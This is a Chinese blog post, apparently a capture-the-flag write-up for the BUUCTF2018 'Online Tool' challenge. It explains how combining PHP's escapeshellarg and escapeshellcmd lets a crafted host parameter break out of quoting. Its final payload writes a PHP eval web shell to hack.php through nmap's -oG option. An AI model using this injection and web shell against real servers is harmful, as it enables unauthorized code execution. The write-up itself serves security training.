
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>BUUCTF2018-Online Tool 1 - Xiaofeiji&#39;Blog</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Xiaofeiji,"> 
    <meta name="description" content="饭前一杯柠檬水
escapeshellarg：

escapeshellarg() 将给字符串增加一个 单引号 并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell,"> 
    <meta name="author" content="Xiaofeiji"> 
    <link rel="alternative" href="atom.xml" title="Xiaofeiji&#39;Blog" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.jpg"> 
    
    
<link rel="stylesheet" href="/css/diaspora.css">

	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
   <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
   </script>

<meta name="generator" content="Hexo 5.3.0"></head>


<body class="loading">
    <span id="config-title" style="display:none">Xiaofeiji&#39;Blog</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="https://xiaofeiji-77.github.io"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">BUUCTF2018-Online Tool 1</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">BUUCTF2018-Online Tool 1</h1>
        <div class="stuff">
            <span>三月 19, 2021</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/buuctf%E5%88%B7%E9%A2%98%E4%B9%8B%E6%97%85/" rel="tag">buuctf刷题之旅</a></li></ul>


        </div>
        <div class="content markdown">
            <h3 id="饭前一杯柠檬水"><a href="#饭前一杯柠檬水" class="headerlink" title="饭前一杯柠檬水"></a>饭前一杯柠檬水</h3><ul>
<li>escapeshellarg：</li>
</ul>
<p>escapeshellarg() 将给字符串增加一个 单引号 并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 命令执行函数，并且还是确保安全的。shell 命令执行函数包含 exec(), system() 执行运算符 (反引号)。</p>
<ul>
<li>escapeshellcmd：</li>
</ul>
<p>escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数，或者 执行操作符 之前进行转义。</p>
<ul>
<li>反斜线（\）会在以下字符之前插入：</li>
</ul>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;#;`|*?~&lt;&gt;^()[]&#123;&#125;$ \, \x0A（换行） 和 \xFF</span><br></pre></td></tr></table></figure>
<p><strong>’ 和 “ 仅在不配对儿的时候被转义。</strong></p>
<p>这两个函数都会对单引号进行处理，但还是有区别的，区别如下：</p>
<p><img src="/2021/03/19/BUUCTF2018-Online-Tool-1/1.png" alt="1"></p>
<p><strong>对于单个单引号, escapeshellarg 函数转义后，还会在左右各加一个单引号，但 escapeshellcmd 函数是直接加一个转义符，对于成对的单引号，escapeshellcmd 函数默认不转义，但 escapeshellarg 函数转义。</strong></p>
<ul>
<li>escapeshellcmd 和 escapeshellarg 一起使用的时候：</li>
</ul>
<p><strong>例子：</strong></p>
<ol>
<li>传入的参数是</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">172.17</span><span class="number">.0</span><span class="number">.2</span>’ -v -d a=<span class="number">1</span></span><br></pre></td></tr></table></figure>


<ol start="2">
<li>经过escapeshellarg处理后变成’172.17.0.2’&#39;‘ -v -d a=1’，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。</li>
</ol>
<ol start="3">
<li>经过escapeshellcmd处理后变成’172.17.0.2’\‘’ -v -d a=1’，这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义</li>
</ol>
<ol start="4">
<li>最后执行的命令是curl ‘172.17.0.2’\‘’ -v -d a=1&#39;，由于中间的\被解释为\而不再是转义字符，所以后面的’没有被转义，与再后面的’配对儿成了一个空白连接符。所以可以简化为</li>
</ol>
<p>curl 172.17.0.2\ -v -d a=1’，即向172.17.0.2\发起请求，POST 数据为a=1’。</p>
<p><img src="/2021/03/19/BUUCTF2018-Online-Tool-1/2.png" alt="2"></p>
<p><strong>但是如果是先用 escapeshellcmd 函数过滤，再用的 escapeshellarg 函数过滤，则没有这个问题。</strong></p>
<ul>
<li><strong>在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件。</strong></li>
</ul>
<h3 id="恰饭恰饭"><a href="#恰饭恰饭" class="headerlink" title="恰饭恰饭"></a>恰饭恰饭</h3><p><img src="/2021/03/19/BUUCTF2018-Online-Tool-1/3.png" alt="3"></p>
<h4 id="代码审计："><a href="#代码审计：" class="headerlink" title="代码审计："></a><strong>代码审计：</strong></h4><p>remote_addr和x_forwarded_for这两个是服务器获取ip用的。</p>
<p>代码的本意是希望我们输入ip这样的参数，通过上面的两个函数来进行规则过滤转译，我们的输入会被单引号引起来，但因为函数的特性所以我们可以逃脱这个引号的束缚。</p>
<p>结合前面的知识点，我们就可以发现nmap命令这个点可以利用，这个命令就是我们的输入可控，然后写入到文件，很自然的想到了上传一个一句话木马了，用nmap -oG将一句话写入到文件。</p>
<h4 id="payload容易出现的问题"><a href="#payload容易出现的问题" class="headerlink" title="payload容易出现的问题"></a>payload容易出现的问题</h4><ol>
<li><p>左右两边不加引号：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?host=&lt;?php <span class="meta">@eval($_POST[&quot;hack&quot;])</span>;?&gt; -oG hack.php</span><br></pre></td></tr></table></figure>
<p>代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$host = <span class="string">&quot;&lt;?php @eval($_POST[&quot;</span>hack<span class="string">&quot;]);?&gt; -oG hack.php&quot;</span>;</span><br><span class="line">$host = escapeshellarg($host);</span><br><span class="line">$host2 = escapeshellcmd($host);</span><br><span class="line">echo $host.<span class="string">&quot;\n&quot;</span>.$host2;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>输出：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&lt;?php @eval($_POST[&quot;hack&quot;]);?&gt; -oG hack.php&#x27;</span></span><br><span class="line"><span class="string">&#x27;\&lt;\?php @eval\(\$_POST\[&quot;hack&quot;\]\)\;\?\&gt; -oG hack.php&#x27;</span></span><br></pre></td></tr></table></figure>
<p>实验发现不可行。</p>
<p><img src="/2021/03/19/BUUCTF2018-Online-Tool-1/4.png" alt="4"></p>
</li>
</ol>
<ol start="2">
<li>如果后面没有加引号：</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?host=<span class="string">&#x27; &lt;?php @eval($_POST[&quot;hack&quot;]);?&gt; -oG hack.php</span></span><br></pre></td></tr></table></figure>
<p>代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$host = <span class="string">&quot;&#x27; &lt;?php @eval($_POST[&quot;</span>hack<span class="string">&quot;]);?&gt; -oG hack.php&quot;</span>;</span><br><span class="line">$host = escapeshellarg($host);</span><br><span class="line">$host2 = escapeshellcmd($host);</span><br><span class="line">echo $host.<span class="string">&quot;\n&quot;</span>.$host2;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>输出：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>\<span class="string">&#x27;&#x27;</span> &lt;?php <span class="meta">@eval($_POST[&quot;hack&quot;])</span>;?&gt; -oG hack.php<span class="string">&#x27;</span></span><br><span class="line"><span class="string">&#x27;</span><span class="string">&#x27;\\&#x27;</span><span class="string">&#x27; \&lt;\?php @eval\(\$_POST\[&quot;hack&quot;\]\)\;\?\&gt; -oG hack.php\&#x27;</span></span><br></pre></td></tr></table></figure>
<p>这会导致文件名的后面多出一个引号.</p>
<p><img src="/2021/03/19/BUUCTF2018-Online-Tool-1/5.png" alt="5"></p>
<ol start="3">
<li>如果文件后面加的引号前面没有空格：</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?host=<span class="string">&#x27; &lt;?php @eval($_POST[&quot;hack&quot;]);?&gt; -oG hack.php&#x27;</span></span><br></pre></td></tr></table></figure>
<p>代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$host = <span class="string">&quot;&#x27; &lt;?php @eval($_POST[&quot;</span>hack<span class="string">&quot;]);?&gt; -oG hack.php&#x27;&quot;</span>;</span><br><span class="line">$host = escapeshellarg($host);</span><br><span class="line">$host2 = escapeshellcmd($host);</span><br><span class="line">echo $host.<span class="string">&quot;\n&quot;</span>.$host2;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>输出：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>\<span class="string">&#x27;&#x27;</span> &lt;?php <span class="meta">@eval($_POST[&quot;hack&quot;])</span>;?&gt; -oG hack.php<span class="string">&#x27;\&#x27;&#x27;</span><span class="string">&#x27;</span></span><br><span class="line"><span class="string">&#x27;</span><span class="string">&#x27;\\&#x27;</span><span class="string">&#x27; \&lt;\?php @eval\(\$_POST\[&quot;hack&quot;\]\)\;\?\&gt; -oG hack.php&#x27;</span>\\<span class="string">&#x27;&#x27;</span><span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>
<p>这样会导致输出像上图一样文件名后面多出//</p>
<p>像这样是上传不了正确的文件也执行不了nmap命令的。</p>
<ol start="4">
<li>正确的payload：</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?host=<span class="string">&#x27; &lt;?php @eval($_POST[&quot;hack&quot;]);?&gt; -oG hack.php &#x27;</span></span><br></pre></td></tr></table></figure>
<p>代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$host = <span class="string">&quot;&#x27; &lt;?php @eval($_POST[&quot;</span>hack<span class="string">&quot;]);?&gt; -oG hack.php &#x27;&quot;</span>;</span><br><span class="line">$host = escapeshellarg($host);</span><br><span class="line">$host2 = escapeshellcmd($host);</span><br><span class="line">echo $host.<span class="string">&quot;\n&quot;</span>.$host2;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>输出：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>\<span class="string">&#x27;&#x27;</span> &lt;?php <span class="meta">@eval($_POST[&quot;hack&quot;])</span>;?&gt; -oG hack.php <span class="string">&#x27;\&#x27;&#x27;</span><span class="string">&#x27;</span></span><br><span class="line"><span class="string">&#x27;</span><span class="string">&#x27;\\&#x27;</span><span class="string">&#x27; \&lt;\?php @eval\(\$_POST\[&quot;hack&quot;\]\)\;\?\&gt; -oG hack.php &#x27;</span>\\<span class="string">&#x27;&#x27;</span><span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>
<p>即：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -T5 -sT -Pn --host-timeout <span class="number">2</span> -F \ \&lt;\?php <span class="meta">@eval</span>\(\$_POST\[<span class="string">&quot;hack&quot;</span>\]\)\;\?\&gt; -oG hack.php -oG hack.php</span><br></pre></td></tr></table></figure>
<p>执行后会返回文件夹的名字：</p>
<p><img src="/2021/03/19/BUUCTF2018-Online-Tool-1/6.png" alt="6"></p>
<p>用蚁剑连接hack.php文件，在根目录得到flag。</p>
<p><img src="/2021/03/19/BUUCTF2018-Online-Tool-1/7.png" alt="7"></p>
<p><img src="/2021/03/19/BUUCTF2018-Online-Tool-1/8.png" alt="8"></p>
<p>关于payload的参数为什么要用双引号而不用单引号，请参考这一篇文章啦：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44348894/article/details/105520481">https://blog.csdn.net/weixin_44348894/article/details/105520481</a></p>
<hr>
<h3 id="饭后小憩"><a href="#饭后小憩" class="headerlink" title="饭后小憩"></a>饭后小憩</h3><p>这道题目的关键点在于escapeshellarg()和escapeshellcmd()函数的理解和用法，以及nmap -oG将命令和结果写入到文件。</p>
<p>esacpeshellarg()函数处理单个单引号转义后，还会在左右各加一个单引号，再用单引号将左右两部分括起来从而起到连接的作用。escapeshellcmd()函数对单个引号是直接加上转义字符，并且该函数对成对的单引号不转义。</p>
<h4 id="恰饭参考："><a href="#恰饭参考：" class="headerlink" title="恰饭参考："></a>恰饭参考：</h4><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45521281/article/details/106236200">https://blog.csdn.net/qq_45521281/article/details/106236200</a></p>
<p><a target="_blank" rel="noopener" href="https://www.pianshen.com/article/40031224617/">https://www.pianshen.com/article/40031224617/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/zzjdbk/p/13675394.html">https://www.cnblogs.com/zzjdbk/p/13675394.html</a></p>
<p><a target="_blank" rel="noopener" href="http://www.lmxspace.com/2018/07/16/%E8%B0%88%E8%B0%88escapeshellarg%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E5%92%8C%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98/">http://www.lmxspace.com/2018/07/16/%E8%B0%88%E8%B0%88escapeshellarg%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E5%92%8C%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98/</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable=''
        data-ae=''
        data-ci=''
        data-cs=''
        data-r='xiaofeiji-77.github.io'
        data-o='xiaofeiji-77'
        data-a='xiaofeiji-77'
        data-d='false'
    >查看评论</div>


    </div>
    
        <div class='side'>
			<ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A5%AD%E5%89%8D%E4%B8%80%E6%9D%AF%E6%9F%A0%E6%AA%AC%E6%B0%B4"><span class="toc-number">1.</span> <span class="toc-text">饭前一杯柠檬水</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%81%B0%E9%A5%AD%E6%81%B0%E9%A5%AD"><span class="toc-number">2.</span> <span class="toc-text">恰饭恰饭</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">代码审计：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#payload%E5%AE%B9%E6%98%93%E5%87%BA%E7%8E%B0%E7%9A%84%E9%97%AE%E9%A2%98"><span class="toc-number">2.2.</span> <span class="toc-text">payload容易出现的问题</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A5%AD%E5%90%8E%E5%B0%8F%E6%86%A9"><span class="toc-number">3.</span> <span class="toc-text">饭后小憩</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%81%B0%E9%A5%AD%E5%8F%82%E8%80%83%EF%BC%9A"><span class="toc-number">3.1.</span> <span class="toc-text">恰饭参考：</span></a></li></ol></li></ol>	
        </div>
    
</div>


    </div>
</div>
   
</body>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






<script src="https://cdn.jsdelivr.net/gh/wallleap/cdn/js/sakura.js"></script>

<!--单击显示文字-->
<script type="text/javascript" src="/js/click_show_text.js"></script>
<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<script src="https://cdn.jsdelivr.net/gh/wallleap/cdn/js/canvas-nest.min.js"></script>
</html>
